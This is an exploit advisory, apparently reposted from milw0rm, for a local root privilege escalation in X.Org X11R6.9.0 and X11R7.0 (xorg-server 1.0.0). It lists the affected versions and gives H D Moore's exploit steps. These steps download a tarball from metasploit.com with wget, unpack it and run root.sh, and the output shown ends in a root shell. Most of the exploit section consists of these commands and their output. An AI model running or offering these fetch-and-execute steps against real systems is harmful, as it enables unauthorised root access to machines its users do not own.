X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation (Exploit) Summary
"The X.Org Foundation provides an open source implementation of the X Window System." A privileges escalation with in X.org allows attackers to gain root privileges, the following exploit code can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by H D Moore.
The original article can be found at: http://www.milw0rm.org/exploits/1596
Details
Vulnerable Systems:
* xorg-server version 1.0.0, as shipped with X11R7.0
* xorg-server version X11R7.0rc
* xorg-server version X11R6.9.0
* xorg-server version X11R6.9.0rc
* xorg-server version X11R6.8.2
* xorg-server version X11R6.8.2rc
Exploit:
# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable.
# The rest is H D Moore from metasploit
Two second exploit, but if anyone is lazy:
$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c
X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...
# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz
# milw0rm.com [2006-03-20]
推荐
评论(0条)
